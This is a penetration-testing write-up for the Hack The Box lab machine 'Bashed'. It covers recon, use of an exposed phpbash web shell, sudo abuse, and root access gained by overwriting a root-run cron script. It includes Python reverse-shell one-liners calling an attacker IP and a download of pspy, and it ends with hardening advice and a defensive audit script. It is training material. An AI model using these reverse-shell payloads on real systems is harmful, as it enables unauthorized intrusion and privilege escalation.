Bashed - Hack The Box Writeup

Overview

Bashed is an easy-rated Linux machine from Hack The Box that focuses on web application vulnerabilities and privilege escalation through cron jobs. This writeup documents the complete penetration testing process from initial reconnaissance to root access.


Reconnaissance

Target Information

export target=10.129.15.19

Network Scanning

Initial TCP Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target

Results:

Service Version Detection

sudo nmap -sC -sV -p 80 -T4 $target

Detailed Results:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Web Enumeration

Website Analysis

Visiting http://10.129.15.19 reveals a development website with limited functionality.

Directory Brute Forcing

gobuster dir -u http://10.129.15.19 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,txt,html -t 50 2>/dev/null

Discovered Directories:

Key Discovery

Visiting http://10.129.15.19/dev/ reveals two files:


Initial Access

Web Shell Exploitation

Accessing http://10.129.15.19/dev/phpbash.php provides direct command execution capability.

Reverse Shell Establishment

# On attacker machine
nc -nlvp 4444

# Through phpbash.php
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.172",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

Shell Stabilization

python -c 'import pty;pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm


Privilege Escalation

User Enumeration

sudo -l

Output:

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Lateral Movement to Scriptmanager

sudo -u scriptmanager bash

File System Discovery

cd /scripts
ls -la

Contents:

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Nov  8 04:25 test.txt

Script Analysis

test.py:

f = open("test.txt", "w")
f.write("testing 123!")
f.close

Process Monitoring with pspy

# Transfer pspy to target
wget http://10.10.14.172/pspy32 -O /tmp/pspy32
chmod +x /tmp/pspy32
/tmp/pspy32

Critical Finding:

2025/11/08 04:34:01 CMD: UID=0 PID=1342 | python test.py

The test.py script is executed as root (UID=0) by a cron job, which also explains why test.txt in the listing above is owned by root.


Root Access

Reverse Shell Payload

Because scriptmanager owns both /scripts and test.py, the script can be replaced with a reverse shell payload:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.172",9004))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Root Shell Capture

# On attacker machine
nc -nlvp 9004

Wait for the cron job to execute (less than 1 minute).

Proof of Compromise

# Root shell commands
id
whoami
hostname
cat /home/arrexel/user.txt
cat /root/root.txt

Flags:


Attack Summary

  1. Reconnaissance: Discovered HTTP service on port 80
  2. Web Enumeration: Found /dev/phpbash.php web shell
  3. Initial Access: Established reverse shell through web shell
  4. Privilege Escalation:
    • Abused sudo permissions to become scriptmanager
    • Discovered root-executed cron job
    • Replaced Python script with reverse shell payload
  5. Root Access: Gained root shell via cron job execution

Security Recommendations

  1. Remove Development Files: Delete phpbash.php and other development tools from production environments
  2. Principle of Least Privilege: Review and restrict sudo permissions
  3. Cron Job Security: Ensure cron jobs don’t execute user-writable scripts as root
  4. Regular Audits: Conduct periodic security assessments of file permissions and cron jobs
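
The check behind recommendation 3, as an added example that is not part of the original writeup: it walks a root-run script and every parent directory and reports anything a non-root account could modify, which is the condition /scripts/test.py met here. The function names and the trusted_uids and stop parameters are assumptions made for this illustration.

```python
#!/usr/bin/env python3
"""Audit a script that root's cron runs: who else can modify it?"""
import os
import stat
import sys


def untrusted_write_reasons(st_uid, st_mode, trusted_uids=(0,)):
    """Reasons a file or directory can be changed by a non-trusted account."""
    reasons = []
    if st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st_uid}")
    # A sticky directory (e.g. /tmp) stops users replacing entries they do not own.
    sticky_dir = stat.S_ISDIR(st_mode) and bool(st_mode & stat.S_ISVTX)
    if not sticky_dir:
        if st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
    return reasons


def audit_cron_target(path, trusted_uids=(0,), stop=os.sep):
    """Check the script and every parent directory up to `stop`.

    A writable parent is as bad as a writable script: its owner can
    delete or rename the script and drop a replacement in its place.
    """
    findings = []
    cur = os.path.realpath(path)
    stop = os.path.realpath(stop)
    while True:
        st = os.stat(cur)
        for reason in untrusted_write_reasons(st.st_uid, st.st_mode, trusted_uids):
            findings.append((cur, reason))
        parent = os.path.dirname(cur)
        if cur == stop or parent == cur:
            return findings
        cur = parent


if __name__ == "__main__":
    # Usage (hypothetical file name): python3 audit_cron_target.py /scripts/test.py
    bad = [f for p in sys.argv[1:] for f in audit_cron_target(p)]
    for where, why in bad:
        print(f"{where}: {why}")
    sys.exit(1 if bad else 0)
```

Run it against each script path referenced by root's crontab and the files under /etc/cron.*; a non-zero exit status means at least one path needs its ownership or mode tightened.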

Tools Used